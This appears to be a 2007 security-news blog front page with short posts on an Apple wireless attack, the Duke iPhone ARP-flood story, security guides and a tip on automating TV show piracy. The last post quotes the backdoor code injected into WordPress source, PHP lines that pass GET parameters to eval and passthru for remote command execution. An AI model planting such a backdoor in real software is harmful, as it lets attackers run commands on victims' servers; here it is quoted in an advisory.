Discussions on computers and beyond
Sections
What’s NewStoriesNo new storiesComments last 2 daysNo new commentsLinks last 2 weeksNo recent new links |
Welcome to Topsight.net 
The Apple wireless hackWednesday, September 19 2007 @ 11:13 AM EDT
Views: 3,276  According to a recent infoworld.com article a Non disclosure agreement that was preventing David Maynor from releasing the details of a wireless attack against Apple Computers is now no longer valid. As such David has released a paper on uninformed.org describing the attack in detail.See uninformed.org to read the paper.
Learn to Pirate TV showsFriday, September 14 2007 @ 02:01 PM EDT
Views: 2,588  CNET writter Chris Soghoian describes how to automate TV show downloads for linux, Mac OSX, and Windows in this little gem on Cnet.comFor more info see http://www.tvrss.net/
Windows Vista Tweaking CompanionThursday, September 13 2007 @ 02:03 PM EDT
Views: 2,567  Tweakguides.com has released an all inclusive guide for Windows Vista (all versions). If you're new to windows vista or an advanced user looking to speed up or lock down your vista machine this guide is equally useful and effectively replaces any printed reference material. Best of all it's free.Note as of writing this post the guide was last update 7/5/07
10 claims that scare security prosWednesday, August 15 2007 @ 07:01 AM EDT
Views: 1,793  I love this: Jon Espenschied for computerworld writes this little "10 claims" article, but it's amazingly true, in that I keep seeing this over and over and over.... like this:3. "That doesn't apply to the boss." Most of these bad apples can be managed by appealing to their Machiavellian sense of influencing others' behavior: that they at least ought to appear to be leading by example, while continuing to do whatever it is they do with the door closed. Few would admit it, but I've run across many IT organizations that simply budget a DSL line for "guest" access in the executive's office, turn a blind eye to whatever gets plugged in and chalk up support time to the test lab. It's not a desirable solution, but if the executive's still willing to sign a Sarbanes-Oxley attestation, the rest comes down to plausible deniability.
When iPhones attack!Wednesday, July 18 2007 @ 10:04 AM EDT
Views: 2,445 Update 07/22/07: Duke University said yesterday that widely publicized problems with its campus wireless network it had originally blamed on Apple Inc. iPhones had instead been traced to Cisco Systems Inc. hardware. See article at computer worldIt’s been widely reported now (thanks to Network World for the poor fact checking) that the iPhone has downed over 30 access points on the Duke University network due to a continued flood of ARP packets. Here are some questions I have for the Admins at Duke: 1. How do you know the iPhone is causing the flood? A fairly old attack against switches to be able to sniff packets going over the switch involves overloading a switches CAM table. This is done by flooding a switch with bogus arp traffic with many different source mac addresses. See: Packet Sniffingon Layer 2 Switched also see winArpAttacker - a window tool that will perform these attacks 2. Is it possible you have a bridging loop? In the case of loops and arp packets, your system may broadcast a single ARP packet but the bridging loop causes it to appear many times over, hence your routers (and WiFi controllers) would spend lots of time replying to the same request. Do you have Spanning tree protocol disabled? For more info on bridging loops see: wildpackets.com Its funny how we take Duke at there word, I personally own an iPhone. I’ve connected it to many wireless networks and found that it has always performed as expected. I’ve also used ARP cache poising against the device using Cain and Abel. I found that each time I performed the attack on the iPhone, the iPhone simply disassociated from the wireless network.I'd imagine that on seeing an arp flood on the Duke network those iPhones would also disassociate.
oh Look apple wormWednesday, July 18 2007 @ 09:15 AM EDT
Views: 2,177 From:
http://infosecsellout.blogspot.com"This is for you all Apple fans, please be aware that there are no such thing as full proof system and stop been all crazy about it. Sure Apple builds cool computers but stop ignoring the truth. Please follow this link: http://www.securityfocus.com Enough. It's bad enough that this supposed worm author intends to release a fully functional worm based on an undisclosed vulnerability (ethics anyone?), but where's the proof? Shame on securityfocus for including this in there database with zero proof.
Data Carving With PhotoRecThursday, June 14 2007 @ 07:25 AM EDT
Views: 2,033  The nice folks at Iron geek have done a great tutorial on the use of the opensource file recovery tool PhotoRec. See: http://www.irongeek.com/i.php?page=videos/data-carving-with-photorec-to-retrieve-deleted-files-from-formatted-drives-for-forensics-and-disaster-recovery Or for the direct download: http://www.cgsecurity.org/
NSA information assurance operating system guidesMonday, March 19 2007 @ 05:13 PM EDT
Views: 3,069 The NSA has published a number of security guidelines for Apple OS X, Windows 2K, XP, 2003 and Sun Solaris 8 & 9. The Guides are about as detailed as you could expect from a government agency of the size and class of the NSA (extremely detailed).See: http://www.nsa.gov/snac/downloads_os.cfm?MenuID=scg10.3.1.1
Apple airport Extreme Update 2007-002 Breaks WPASunday, March 11 2007 @ 12:36 AM EST
Views: 3,404 March 8th 2007 Apple realeased Airport Extreme Update 2007-002. It has been my personal experience that this update, when applied to an intel core duo mac book pro will break WPA encryption.This causes loss of network connectivity. Connections to non-WPA based network with the patch applied functions normally.
Wordpress source code compromised to enable remote code executionSunday, March 04 2007 @ 08:46 AM EST
Views: 2,052  According to Ivan Fratric of http://ifsec.blogspot.com/:While assessing the security of WordPress, a popular blog creation software, I have discovered that it's source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php. The following code has been added: in wp-includes/feed.php function comment_text_phpfilter($filterdata) { eval($filterdata); } ... if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); } in wp-includes/theme.php function get_theme_mcommand($mcds) { passthru($mcds); } ... if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); } |
Google News - Tech
Slashdot
Kuro5hinThe Register
OSNews
|
|
Copyright © 2008 Topsight.net All trademarks and copyrights on this page are owned by their respective owners. |
Powered By Geeklog Created this page in 0.27 seconds |